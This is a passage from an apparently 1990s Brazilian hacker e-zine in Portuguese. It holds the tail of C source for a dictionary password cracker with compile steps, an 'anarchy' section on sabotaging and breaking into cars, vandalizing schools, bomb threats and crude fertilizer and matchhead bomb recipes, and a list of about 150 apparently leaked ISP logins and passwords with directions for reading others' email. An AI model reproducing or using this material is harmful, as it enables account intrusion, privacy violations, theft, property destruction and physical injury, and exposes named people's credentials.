            if ((isspace(c)) || (iscntrl(c) == NULL))
                ungetc(c, fp);

            try_word(buff);
            reverse_word(buff);
            strcpy(buff, "");
            flag = 0;
            strcpy(temp, "");
        }
    }
}

fclose(fp);
remove("gecost");
}

/* Takes a string of characters as its argument(in this case the login
i.d., and then reverses it */

void reverse_word( char *wd )
{
    char temp[2], buff[WORDSIZE];
    int i;

    i = strlen(wd) + 1;
    strcpy(temp, "");
    strcpy(buff, "");

    do
    {
        i--;
        if ((isalnum(wd[i]) || (ispunct(wd[i])))) != NULL) {
            sprintf(temp, "%c", wd[i]);
            strncat(buff, temp, 1);
        }
    } while(i != 0);

    if (strlen(buff) > 1)
        try_word(buff);
}

/* Read one word at a time from the specified dictionary for use
as possible passwords, if dictionary filename is NULL, ignore
this operation */

```

```

void do_dict( void )
{
    FILE *fp;
    char buff[WORDSIZE], temp[2];
    int c;

    strcpy(buff, "");
    strcpy(temp, "");

    if (dict == NULL)
        exit(0);

    if ((fp = fopen(dict, "r")) == NULL) {
        printf("Error opening dictionary file\n");
        exit(0);
    }

    rewind(fp);

    while ((c = fgetc(fp)) != EOF)
    {
        if ((c != ' ') || (c != '\n')) {
            strcpy(temp, "");
            sprintf(temp, "%c", c);
            strncat(buff, temp, 1);
        }

        if (c == '\n') {
            if (buff[0] != ' ')
                try_word(buff);

            strcpy(buff, "");
        }
    }

    fclose(fp);
}

/* Process the word to be used as a password by stripping \n from
   it if necessary, then use the pwauth() function, with the login
   name and word to attempt to get a valid id & password */

void try_word( char pw[] )
{
    int pwstat, i, pwlength;
    char temp[2], buff[WORDSIZE];

    strcpy(buff, "");
    pwlength = strlen(pw);

    for (i = 0; i != pwlength; i++)
    {
        if (pw[i] != '\n') {
            strcpy(temp, "");
            sprintf(temp, "%c", pw[i]);
            strncat(buff, temp, 1);
        }
    }

    if (strlen(buff) > 3 ) {
        printf("Trying : %s\n", buff);

        if (pwstat = pwauth(logname, buff) == NULL) {
            printf("Valid Password! - writing details to 'data'\n");

            write_details(buff);

            if (strcmp(mode, "f") == NULL)
                exit(0);
        }
    }
}

```

```

/* If valid account & password, store this, along with the accounts
   uid, gid, comment, homedir & shell in a file called 'data' */

void write_details( char *pw )
{
FILE *fp;

if ((fp = fopen(OUTFILE, "a")) == NULL) {
    printf("Error opening output file\n");
    exit(0);
}

fprintf(fp, "%s:%s:%d:%d:", logname, pw, uid, gid);
fprintf(fp, "%s:%s:%s\n", comment, homedir, shell);
fclose(fp);
}

```

---CORTE AQUI-----

Bom... pra compilar isso escreva:

```
$ gcc shcrack.c -o shcrack
```

Ou tente!

```
$ gcc shcrack.c -o shcrack
```

Isso pode variar dependendo do seu compilador.

```
}-----[chain]-----{
```

9-) ANARCHY

~~~~~

Como mandar um carro para o inferno!

-----

Existem mil maneiras de destruir um carro mas lembre-se que isso pode ser divertido para voce, destrutivo para alguem e dificil dos policiais pegar.

- Coloque uma bomba de CO2 perto do tanque de gasolina.
- Coloque sujeira, acucar ( esse e bom ), uma bolinha de ping-pong ou alguma coisa que dissolva no tanque de gasolina.
- Plastico deforma e dilue dentro do tanque. O resultado final e dificuldade de injetar gasolina. Causando possivelmente a troca da valvula.
- Uma boa e coloca, pedras, bananas, alguma coisa que vai tampar dentro do cano de descarga.  
\* Use um pedaco de pau para empurrar para dentro.
- Coloque um fio comprido no tanque de gasolina e acenda ele.
- Roube a chave, tire uma copia, coloque ela no lugar novamente e roube o som do carro.
- Arrombe o carro. Corte um pedacao de metal fino parecido com o desenho:



OBS.:VEJA O DESENHO COM MODO TERMINAL PARA ENTENDER

Faca a operacao do lado de fora do carro. Coloque do lado de fora do vidro forçando o cabo o qual vai desbloquear a porta. Essa tecnica e conhecida como SLIM JIM. Agora voce pode roubar o som, equalizador, detector

de radar.

Dica: Para destruir o interior do carro jogue um cachorro ou um gato. Um pato tambem serve por nao ter bons habitos de higiene.

- Expelhos retrovisores sao muito facil de ser arrancados. Geralmente empurrando do lado expelhado eles quebram.
- Faca uma bola de DUREPOX com 3 ou 4 pregos, coloque em baixo do pneu.
- Pode tambem usar um anel para arranhar as portas.

Voce odeia a sua escola?

-----  
by HaphazarD - Brazil - Global Domination inc.

- Realmente a minha favorita e passar cola ( melhor usar cola de sapateiro ) nas fechaduras da entrada e por tudo onde for possivel.
- Voce pode tambem colocar uma bomba no banheiro, ou simplesmente colocar uma falsa bomba no banheiro, certamente eles terao que investigar e suspenderao as aulas naquele dia.
- Peque um pouco de potassio puro ou sodio puro, coloque isso em uma capsula e manda embora com a descarga do banheiro ( cheiro podre! )
- Coloque uma granada com cigarro no hall de entrada! Uma bomba normal com pavio de cigarro, que demora em media 15 minutos para explodir, enquanto voce esta na sua sala de aula e vai ouvir o barrulho junto aos seus amigos.
- Roube senhas ou chaves de computadores. Ou roube o cartao de 80 colunas que tem dentro dos IBMs.
- Mande uma carta para sua escola com um disco de 1.2 ou um de 1.44, ( segredo: coloque dentro do disco pedacos pequenos de imans ). Para parecer real coloque uma etiqueta bonita e diga na carta que e' um novissimo anti-virus que esta sendo mandado para todas as escolas. Se preciso falsifique o simbolo do governo do estado.
- Jogue seu chiclete no carpete da biblioteca ou alguma coisa que grude bastante.  
Fique cuidando os auxiliares de disciplina chorarem.
- Pinte no murro da escola que o diretor e' facista.
- Coloque uma batata no cano de descarga do diretor.
- Pegue um virus em uma BBS e infecte os computadores deles.  
De preferencia se tiver Word ou Excel... argg....
- Use um clips prendendo-o com uma borracha. ( para nao ser eletrocutado )  
coloque ele na tomada, a maneira mais facil de queima-la.

Como fazer uma bomba de fertilizante

-----

Ingredientes:

- Jornal
- Fertilizante ( escolha o tipo quimico )
- Algodao
- Diesel ( combustivel )

Faca um montinho de jornal e coloque um pouco de fertilizante dentro. Coloque algodao sobre ele e entao ensope o algodao com o diesel. Acenda e depois corra como voce nunca correu antes. A explosao e violenta portanto nao faca isso em ambiente fechados.

## Bola de tenis bomba

-----

### Ingredientes:

- Milhoes de cabeca de palito
- Uma bola de tenis
- Uma faca bem afiada
- Fita bem forte

Depois de arrancar uma tonelada de cabeca de palito de fosforo corte um PEQUENO buraco em uma bola de tenis.  
Encha a bola com as cabecas de palitos ate nao ter mais espaco nenhum.  
Fique certo que isso e muito legal mesmo!  
Bom, quando voce ver algum amigo andando na rua jogue nele. Ele vai levar o maior susto com o estouro.

## Como jogar fliperama de graca

-----

### Ingredientes:

- Tampas de garrafa
- Vela branca grossa
- Faca bem afiada
- Uma ficha de fliperama original

Corte a vela em pequenas rodelaas parecidas com a ficha.  
Amasse bem as tampinhas de modo que fiquem muito finas, e entao coloque as laminas metalicas dentro das da vela.  
Nao esqueca de dar o formato das entradas moldados na cera entao deixe elas no refrigerador por umas 5 horas ate ficar bem duras.

}-----[chain]-----{

## 10-) CARTAS

~~~~~

Nao tem carta nao, simplesmente pelo fato de que estamos comecando, entao se voce tem alguma duvida, comentario, critica, dica ou mesmo quer fazer parte da equipe que vai comecar a distribuir nossa revista entre em contato com:

Acidmud - acidmud@thepentagon.com  
VooDoo - voodoo@deathdoor.com  
Haphazard - por minha parte falar sobre anarchy nao darei meu e-mail

Para que sua BBS receba sempre um exemplar primeiro que os outros escreva-nos Prometemos publicar todo material que nos for enviado, claro depois de avaliado. Tambem nao vamos colocar lixo e besteiras...  
Se voce achar algum erro em nosso material escreva-nos por favor.  
Sua participacao e' muito importante para nos, pois soh assim continuaremos com nosso zine.

Voce pode nos encontrar tambem no canal #hackers e #bluebox nos servidores de irc brasileiros. ex: irc.kanopus.com.br e irc.bsi.com.br  
AVISO: Nao distribua essa revista para pessoas que trabalhem em provedores.

\*\*\*\*\*  
BONUS EXTRA ----- senhas de provedores  
\*\*\*\*\*  
(c)1996 Reg. by Acidmud & VooDoo Global Domination Inc.

Cortesia de AcIDmuD e VooDoo servindo a comunidade hacker e contribuindo com a DESTRUICAO dos provedores  
Obs.: Provedores com precos abusivos. OnLy!

E'... pra ver como nos somos generosos. Ai estao algumas senhas de dois grandes provedores brasileiros, um de Sao Paulo e outro de Joinville -SC. Com essas senhas alem de acessar a inet de graca voce pode ler o mail de outras pessoas somente trocando a configuracao do seu software de mail. Tipo... substitua onde diz: seu.provedor.com.br por kanopus.com.br Onde tem o login voce deve colocar o novo login com sua respectiva senha. Pode usar o soft de telnet para acessar a esses users. Onde for netville use: netville.com.br Para ler os mails escreva no prompt do telnet.

\$ mail

Vai aparecer uma lista que voce pode acessar por meio dos numeros.

-----  
SE SEU NOME APARECE NA LISTA ABAIXO NAO SE OFENDA. ALEM DE VOCE SER PES-  
SIMO NA ESCOLHA DA SENHA SEU PROVEDOR E' UMA M3RD4....

-----  
---->>> Mes que vem tem as senhas da ELOGICA e da BRAZNET <<<-----

- KANOPUS -

| LOGIN       | SENHA     |
|-------------|-----------|
| -----       | -----     |
| help        | help      |
| funcao.help | help      |
| gr3350      | 123       |
| fwa         | 1234      |
| gr2502      | 12345     |
| gr4240      | 1961      |
| niki        | 1963      |
| wellner     | 1978      |
| c.surek     | 1996      |
| danielbr    | zool      |
| anafonso    | zool      |
| veralm      | zool      |
| agenor      | agenor    |
| apsoft      | alex      |
| mggatech    | arcadia   |
| axel        | axel      |
| uteste      | banana    |
| demo15      | banana    |
| artes       | banana    |
| viana       | behrens   |
| farinha     | brasilvia |
| nr7pcms0    | cad       |
| carolina    | carolina  |
| cecilia     | cecilia   |
| nepomoceno  | claudio   |
| gr5035      | claudio   |
| gr6000      | claudio   |
| costa       | costa     |
| customer    | customer  |
| dag         | dag       |
| danielle    | danielle  |
| ecg840      | deborah   |
| teodoro     | digital   |
| dgavden     | duncan    |
| eliane      | eliane    |
| email       | email     |
| reginato    | emilia    |
| harbar      | eugenio   |
| fernando    | fernando  |
| florinda    | florinda  |
| sandor      | gabriel   |
| thomaz      | guipar    |
| helio       | helio     |
| siqueira    | hendrix   |
| hermes      | hermes    |
| clsb        | ibm       |

|          |        |
|----------|--------|
| mruiz    | irina  |
| hideko   | iris   |
| jere     | jere   |
| wap      | julio  |
| hell     | joplin |
| grios    | jessi  |
| uruzinho | jesus  |
| grios    | jessi  |

- NETVILLE -

| LOGIN    | SENHA    |
|----------|----------|
| -----    | -----    |
| agenciaa | public   |
| acf01    | andre    |
| baf      | 1950     |
| peters   | 1960     |
| homke    | 1994     |
| ivansky  | 1996     |
| aro      | 1998     |
| lineu    | alexia   |
| garcia   | aline    |
| jba      | ana      |
| guido    | andrey   |
| petit    | angelico |
| cetil    | arosa    |
| jardim   | arte     |
| eder     | base     |
| acs      | brenda   |
| marquiot | bruna    |
| fgomes   | cardinal |
| adelar   | carla    |
| profit   | carlos   |
| cboff    | carmem   |
| eydiniz  | carol    |
| wlau     | carol    |
| schulz   | change   |
| lula     | cherry   |
| hahnte   | chicago  |
| shb      | cris     |
| dminatti | data     |
| festugat | debi     |
| cfzucco  | debora   |
| raso     | denis    |
| adelor   | diego    |
| grafos   | dino     |
| magno    | disney   |
| igorz    | flora    |
| brach    | floyd    |
| marias   | fred     |
| anaclara | gabriel  |
| mserv    | gabriel  |
| blinz    | golf     |
| ascensao | grith    |
| langscho | honda    |
| shiino   | honda    |
| wiletrup | honda    |
| peninha  | jake     |
| kids     | joshi    |
| mrmbius  | jumar    |
| labirint | karl     |
| fabiola  | lara     |
| baptista | laura    |
| dornei   | lili     |
| like2net | net      |
| rh12net  | odessa   |
| cdsanjos | palma    |
| prf2net  | paulo    |
| psb01    | pedro    |
| lotario  | perry    |
| spiazera | pia      |
| ruben    | raquel   |
| maine    | rock     |
| nucleo   | rodrigo  |
| scarlet  | scarlet  |

|          |          |
|----------|----------|
| edukato  | dudu     |
| dopke    | earth    |
| polido   | edna     |
| aerton   | elaine   |
| bragam   | silvio   |
| manz     | fana     |
| cordeaca | timmy    |
| flaps    | tito     |
| datasul  | transfer |
| jbone22i | valdivia |
| deli     | viktoria |
| smachado | viper    |
| ruwan    | wizard   |
| sasse    | wolfgang |
| matheus  | aloha    |
| berg     | berg     |
| preprint | bureau   |
| cristaos | call     |
| hansa    | cargo    |
| momento  | chosse   |
| airton   | cinema   |
| claudia  | clad     |
| simetria | clash    |
| jms      | disco    |
| danca    | festival |

\*\*\*\*\*  
 BONUS EXTRA ----- senhas de provedores  
 \*\*\*\*\*

- SE QUISER QUE A REVISTA CONTINUE ESCREVA-NOS, ATENDEREMOS A TODOS -  
 - AGUARDEM - EM BREVE - O PROXIMO NUMERO DA SUA REVISTA HACKER - AXUR 05 -  
   - = = = Dia 01 De FEVEREIRO = = = -  
     EM TODAS AS BBSZ UNDERGROUND